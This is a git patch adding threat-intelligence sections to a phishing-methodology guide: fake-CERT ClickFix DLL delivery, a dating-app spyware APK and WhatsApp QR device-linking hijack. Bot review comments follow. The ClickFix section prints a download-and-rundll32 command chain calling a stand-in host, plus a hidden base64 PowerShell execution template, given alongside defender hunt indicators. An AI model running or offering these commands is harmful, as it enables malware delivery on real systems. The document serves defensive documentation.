From ae9ad206cee6ef9d0aaf9dfbf023f33282798b4a Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 29 Jan 2026 01:55:07 +0000 Subject: [PATCH] Add content from: Love? Actually: Fake dating app used as lure in targeted spy... --- .../phishing-methodology/README.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index 536b6a46c80..ff147a95145 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md 
@@ -526,6 +526,22 @@ Commodity crews offset the cost of high-touch ops with mass attacks that turn ** ``` * Hunt for LOLBins frequently abused by first-stage loaders (e.g. `regsvr32`, `curl`, `mshta`). +### ClickFix DLL delivery tradecraft (fake CERT update) +* Lure: cloned national CERT advisory with an **Update** button that displays step-by-step “fix” instructions. Victims are told to run a batch that downloads a DLL and executes it via `rundll32`. +* Typical batch chain observed: + ```cmd + echo powershell -Command "Invoke-WebRequest -Uri 'https://example[.]org/notepad2.dll' -OutFile '%TEMP%\notepad2.dll'" + echo timeout /t 10 + echo rundll32.exe "%TEMP%\notepad2.dll",notepad + ``` + * `Invoke-WebRequest` drops the payload to `%TEMP%`, a short sleep hides network jitter, then `rundll32` calls the exported entrypoint (`notepad`). +* The DLL beacons host identity and polls C2 every few minutes. Remote tasking arrives as **base64-encoded PowerShell** executed hidden and with policy bypass: + ```powershell + powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('')) | Invoke-Expression" + ``` + * This preserves C2 flexibility (server can swap tasks without updating the DLL) and hides console windows. Hunt for PowerShell children of `rundll32.exe` using `-WindowStyle Hidden` + `FromBase64String` + `Invoke-Expression` together. +* Defenders can look for HTTP(S) callbacks of the form `...page.php?tynor=sss` and 5-minute polling intervals after DLL load. + --- ## AI-Enhanced Phishing Operations 
@@ -611,6 +627,15 @@ clipboard-hijacking.md mobile-phishing-malicious-apps.md {{#endref}} +### Romance-gated APK + WhatsApp pivot (dating-app lure) +* The APK embeds static credentials and per-profile “unlock codes” (no server auth). Victims follow a fake exclusivity flow (login → locked profiles → unlock) and, on correct codes, are redirected into WhatsApp chats with attacker-controlled `+92` numbers while spyware runs silently. +* Collection starts even before login: immediate exfil of **device ID**, contacts (as `.txt` from cache), and documents (images/PDF/Office/OpenXML). A content observer auto-uploads new photos; a scheduled job re-scans for new documents every **5 minutes**. +* Persistence: registers for `BOOT_COMPLETED` and keeps a **foreground service** alive to survive reboots and background evictions. + +### WhatsApp device-linking hijack via QR social engineering +* A lure page (e.g., fake ministry/CERT “channel”) displays a WhatsApp Web/Desktop QR and instructs the victim to scan it, silently adding the attacker as a **linked device**. +* Attacker immediately gains chat/contact visibility until the session is removed. Victims may later see a “new device linked” notification; defenders can hunt for unexpected device-link events shortly after visits to untrusted QR pages. + ### Mobile‑gated phishing to evade crawlers/sandboxes Operators increasingly gate their phishing flows behind a simple device check so desktop crawlers never reach the final pages. A common pattern is a small script that tests for a touch-capable DOM and posts the result to a server endpoint; non‑mobile clients receive HTTP 500 (or a blank page), while mobile users are served the full flow. 
@@ -651,6 +676,8 @@ Defence tips: - [2025 Unit 42 Global Incident Response Report – Social Engineering Edition](https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/) - [Silent Smishing – mobile-gated phishing infra and heuristics (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/) - [The Next Frontier of Runtime Assembly Attacks: Leveraging LLMs to Generate Phishing JavaScript in Real Time](https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/) +- [Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan](https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/) +- [ESET GhostChat IoCs and samples](https://github.com/eset/malware-ioc/tree/master/ghostchat) {{#include ../../banners/hacktricks-training.md}}
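Review bot: in the first hunk (ClickFix DLL delivery), the three `echo` lines in the "typical batch chain" block print the commands instead of running them, so the block does not match the sentence above it that says the victim runs a batch that downloads the DLL and invokes `rundll32`; either drop the `echo` prefixes or say explicitly that the lure has the victim write these lines into a batch file before running it. Two smaller points in the same hunk: the empty `''` argument to `FromBase64String` should be marked as a placeholder for the encoded task rather than the literal observed command, and the `...page.php?tynor=sss` callback plus 5-minute polling are given as hunt indicators with no source named, so state which report they come from so a defender can trace them.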
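Review bot: in the second hunk, the "Romance-gated APK" section lists what the spyware does but, unlike the WhatsApp QR section right after it, gives defenders nothing to look for; add a short hunt line built from the behaviours already described (exfiltration before any login, a `BOOT_COMPLETED` receiver paired with a long-lived foreground service, a media content observer and a 5-minute document re-scan). The QR-hijack bullet ends with "until the session is removed" but never says how: add that the remediation is to open WhatsApp's Linked Devices list and log out any device the user does not recognise.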
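Review bot: the third hunk adds only the two ESET GhostChat references, which cover the dating-app and WhatsApp material; the fake-CERT ClickFix section added by the same patch cites nothing, so either add its source to this list or state inline that it comes from the same ESET report. Minor style point: neighbouring entries carry the publisher in the title (e.g. "(Sekoia.io)"), so the "Love? Actually" entry could be tagged "(ESET)" for consistency.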